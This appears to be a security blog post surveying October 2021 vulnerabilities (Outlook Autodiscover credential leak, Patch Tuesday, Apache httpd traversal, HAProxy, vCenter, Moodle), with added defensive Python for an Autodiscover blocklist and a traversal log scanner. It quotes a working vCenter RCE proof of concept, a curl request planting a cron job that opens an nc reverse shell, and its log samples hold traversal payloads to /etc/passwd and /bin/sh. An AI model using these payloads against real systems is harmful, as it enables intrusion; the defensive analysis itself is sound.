CVSS3: 9.8 High (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Attack Vector: NETWORK; Attack Complexity: LOW; Privileges Required: NONE; User Interaction: NONE; Scope: UNCHANGED; Confidentiality Impact: HIGH; Integrity Impact: HIGH; Availability Impact: HIGH
CVSS2: 7.5 High (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Access Vector: NETWORK; Access Complexity: LOW; Authentication: NONE; Confidentiality Impact: PARTIAL; Integrity Impact: PARTIAL; Availability Impact: PARTIAL
Hello everyone! This episode will be about relatively recent critical vulnerabilities. Let's start with Microsoft Patch Tuesday for October 2021. Specifically, with the vulnerability that I expected to see there, but which did not make it in.
"Autodiscover, a protocol used by Microsoft Exchange for automatic configuration of clients such as Microsoft Outlook, has a design flaw that causes the protocol to “leak” web requests to Autodiscover domains outside of the user’s domain but in the same TLD (i.e. Autodiscover.com)." In other words, when autodiscover.example.com does not answer, the client "backs off" to autodiscover.com, and whoever owns that domain can answer with an authentication challenge and collect the user's credentials. Guardicore Labs acquired multiple Autodiscover domains and captured 372,072 Windows domain credentials in total. It seems Microsoft has chosen to ignore this issue. No CVE, no Outlook or ActiveSync patches. The only mitigation is to block the autodiscover.<tld> domains on the devices themselves (for example in the hosts file, or at the firewall or DNS level).
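To make the leak concrete, here is an added example (my own code, not Guardicore's or Microsoft's): a simplified model of the Autodiscover "back-off" described above, a check that tells which of the resulting hosts lie outside the user's own domain, and the hosts-file blocklist that follows from it. The exact order in which Outlook tries the in-domain URLs is an assumption; the back-off rule (drop the leftmost label of the mail domain, prepend "autodiscover.", repeat down to the TLD) is the behaviour Guardicore reported.

```python
"""Simplified model of the Autodiscover back-off leak (added example, not
code from Guardicore or Microsoft). The in-domain candidate order is an
assumption; the back-off rule is the one from the Guardicore report."""
from urllib.parse import urlparse

AUTODISCOVER_PATH = "/autodiscover/autodiscover.xml"


def autodiscover_candidates(email):
    """Return candidate Autodiscover URLs in the order a client is assumed to try them.

    First the URLs under the user's own domain, then the back-off series:
    for alice@corp.example.com that is autodiscover.example.com and finally
    autodiscover.com, which the organisation does not own.
    """
    domain = email.rsplit("@", 1)[1].lower()
    urls = [
        f"https://autodiscover.{domain}{AUTODISCOVER_PATH}",
        f"https://{domain}{AUTODISCOVER_PATH}",
        f"http://autodiscover.{domain}{AUTODISCOVER_PATH}",
    ]
    labels = domain.split(".")
    for i in range(1, len(labels)):  # back-off: drop one leading label per step
        parent = ".".join(labels[i:])
        urls.append(f"http://autodiscover.{parent}{AUTODISCOVER_PATH}")
    return urls


def is_in_domain(host, domain):
    """True if host is the user's mail domain or a subdomain of it."""
    return host == domain or host.endswith("." + domain)


def foreign_hosts(email):
    """Hosts the client would contact that lie outside the user's own domain.

    Each of these receives the user's credentials if it answers with an
    authentication challenge; that is the leak. Note that a parent domain the
    organisation does own (example.com for corp.example.com) is flagged too,
    so review the list before blocking.
    """
    domain = email.rsplit("@", 1)[1].lower()
    seen = []
    for url in autodiscover_candidates(email):
        host = urlparse(url).hostname
        if not is_in_domain(host, domain) and host not in seen:
            seen.append(host)
    return seen


def hosts_file_blocklist(emails):
    """Build hosts-file lines that sinkhole every foreign autodiscover host
    for the given mailboxes (the endpoint-side mitigation mentioned above)."""
    hosts = []
    for email in emails:
        for host in foreign_hosts(email):
            if host not in hosts:
                hosts.append(host)
    return [f"0.0.0.0 {host}" for host in hosts]


if __name__ == "__main__":
    for url in autodiscover_candidates("alice@corp.example.com"):
        print(url)
    print("\n".join(hosts_file_blocklist(["alice@corp.example.com", "bob@example.co.uk"])))
```

Run it with the mail domains your organisation actually uses; the last entries of each candidate list are the ones that never belonged to you, and the blocklist is only as complete as the set of mail domains you feed in.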
74 vulnerabilities: 1 Critical, 30 High, 43 Medium.
The one to patch first is CVE-2021-40449, a use-after-free vulnerability in the NtGdiResetDC function of the Win32k driver. A detailed technical description is available in the Kaspersky Securelist post; in short, it is a local elevation-of-privilege bug, and the in-the-wild exploit also leaks kernel module addresses from the computer's memory as a step toward the escalation. It is being exploited in the wild by the APT that Kaspersky tracks as MysterySnail. All servers and desktops should be updated.
It is also necessary to update Exchange servers for CVE-2021-26427 (Remote Code Execution, CVSSv3 9.0), but it is not as critical as the score suggests. "Despite the high CVSS score, the advisory does specifically point out that the vulnerability would only be exploitable from an adjacent network". There are no signs of exploitation or public exploits yet. Three other vulnerabilities in Exchange Server were also patched: CVE-2021-41350, a Spoofing vulnerability; CVE-2021-41348, allowing elevation of privilege; and CVE-2021-34453, which is a Denial of Service vulnerability.
DNS servers need to be updated for CVE-2021-40469 (Windows DNS Server Remote Code Execution), but real exploitation is unlikely. Microsoft categorized it as “Exploitation Less Likely.” It received a CVSSv3 score of 7.2 because an attacker needs a privileged user account in order to exploit it across the network.
This is a good reason to check the Windows desktop updates as well: CVE-2021-40486, Microsoft Word Remote Code Execution. "This patch corrects a bug that would allow code execution when a specially crafted Word document is viewed on an affected system. Although Microsoft lists user interaction required, the Preview Pane is also listed as an attack vector." Also take a look at the desktop vulnerability Spoofing - Windows Print Spooler (CVE-2021-36970), rated “Exploitation More Likely”.
And here you can get the whole Vulristics report for Microsoft Patch Tuesday October 2021.
The Apache situation looks like The Benny Hill Show. First they released a new version, 2.4.49, with a critical path traversal / RCE vulnerability, CVE-2021-41773; earlier versions were not affected. The traversal lets an attacker read files outside the document root, and it turns into RCE when CGI scripts are enabled on the affected path. Fortunately, it was disclosed relatively quickly, about two weeks after the release, so the main stable distributions simply had not had time to pick the package up into their repositories. Only fans of building Apache from source and users of Slackware, Fedora and FreeBSD were hit. And what was left for the victims to do? Obviously, hurry to roll out the new "safe" version, 2.4.50. But it turned out that the fix in 2.4.50 was incomplete (tracked as CVE-2021-42013: the same traversal, this time with a double-encoded dot), and the exploit "Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)" is now publicly available. Repeat the exercise, comrades, and roll out 2.4.51 now. Everything will definitely be fine there. It's just a circus.
A critical security vulnerability, CVE-2021-40346, an integer overflow in HTTP header handling, has been disclosed in HAProxy, a widely used open-source load balancer and proxy server. It could be abused by an adversary to smuggle HTTP requests past the proxy, resulting in unauthorized access to sensitive data and execution of arbitrary commands on back-end applications that trust the proxy's routing, effectively opening the door to an array of attacks. A public PoC has appeared for the vulnerability.
"On September 21, 2021, VMware disclosed that its vCenter Server is affected by an arbitrary file upload vulnerability—CVE-2021-22005—in the Analytics service. A malicious cyber actor with network access to port 443 can exploit this vulnerability to execute code on vCenter Server. On September 24, 2021, VMware confirmed reports that CVE-2021-22005 is being exploited in the wild. Security researchers are also reporting mass scanning for vulnerable vCenter Servers and publicly available exploit code. Due to the availability of exploit code, CISA expects widespread exploitation of this vulnerability".
> CVE-2021-22005: Exploitation in the wild confirmed. Unredacted RCE PoC against CEIP below.
> curl -kv "https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh 172.16.57.1 4444" <https://t.co/wi08brjl3r>
>
> – wvu (@wvuuuuuuuuuuuuu) September 27, 2021
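Both the Apache bugs and the vCenter PoC above are directory traversal in the request target, and the difference is only in how the ".." is written: raw in the vCenter query parameter, single-encoded (".%2e") for httpd 2.4.49 and double-encoded (".%%32%65") for 2.4.50. The following added example (my own code, not from Apache, VMware or the PoC author) scans access-log lines for all three shapes by percent-decoding the target repeatedly until it stops changing and then looking for a bare ".." segment. The log lines are constructed for the demonstration and are not real traffic; the payload shapes follow the public reports for CVE-2021-41773, CVE-2021-42013 and the CVE-2021-22005 PoC quoted above.

```python
"""Flag directory-traversal attempts, including percent-encoded variants, in
web-server access logs (added example, not code from the original post).
Sample log lines are constructed; payload shapes follow the public reports."""
import re
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [05/Oct/2021:10:00:01 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1326 "-" "curl/7.79.1"
203.0.113.7 - - [07/Oct/2021:10:00:02 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 200 52 "-" "curl/7.79.1"
198.51.100.9 - - [27/Sep/2021:11:12:13 +0000] "POST /analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/12345 HTTP/1.1" 201 0 "-" "curl/7.79.1"
192.0.2.4 - - [05/Oct/2021:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 4523 "-" "Mozilla/5.0"
192.0.2.5 - - [05/Oct/2021:10:00:06 +0000] "GET /docs/a..b/readme.txt HTTP/1.1" 200 12 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) '
)
# A bare ".." path segment anywhere in the (decoded) request target;
# "a..b" inside a segment is not a traversal and must not match.
DOTDOT_SEGMENT = re.compile(r"(?:^|/)\.\.(?:/|$)")


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decode_iteratively(target, max_rounds=3):
    """Percent-decode until the string stops changing (bounded).

    One round turns ".%2e" into "..", two rounds turn ".%%32%65" into "..".
    Returns (decoded_target, rounds_needed)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
        rounds += 1
    return target, rounds


def find_traversal(target):
    """Return a finding dict if the target contains a ".." segment, else None.

    httpd collapses a raw "/../" itself, so raw hits usually belong to other
    applications (the vCenter PoC passes it in a query parameter); hits that
    appear only after decoding are the httpd 2.4.49 / 2.4.50 shapes.
    """
    if DOTDOT_SEGMENT.search(target):
        return {"rule": "plain-traversal", "rounds": 0, "decoded": target}
    decoded, rounds = decode_iteratively(target)
    if rounds and DOTDOT_SEGMENT.search(decoded):
        return {"rule": "encoded-traversal", "rounds": rounds, "decoded": decoded}
    return None


def scan_log(text):
    """Run find_traversal over every parseable line; return the list of findings."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        hit = find_traversal(entry["target"])
        if hit:
            hit.update(client=entry["client"], method=entry["method"],
                       target=entry["target"], status=entry["status"])
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']} {f['method']} {f['rule']} "
              f"(decode rounds={f['rounds']}) -> {f['decoded']}")
```

The bounded decode loop is the important part: a single unquote() misses the 2.4.50 variant, and an unbounded one is a denial-of-service invitation. A 200 status on a flagged line means the traversal actually returned something and deserves a look at what was requested; a 404 or 403 is still reconnaissance worth correlating by source address.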
Several RCE exploits for Moodle were released on October 13.
"Moodle is a free and open-source learning management system. It is used for blended learning, distance education, flipped classroom and other e-learning projects in schools, universities, workplaces and other sectors". Surely some organizations expose it on the network perimeter and do not update it regularly.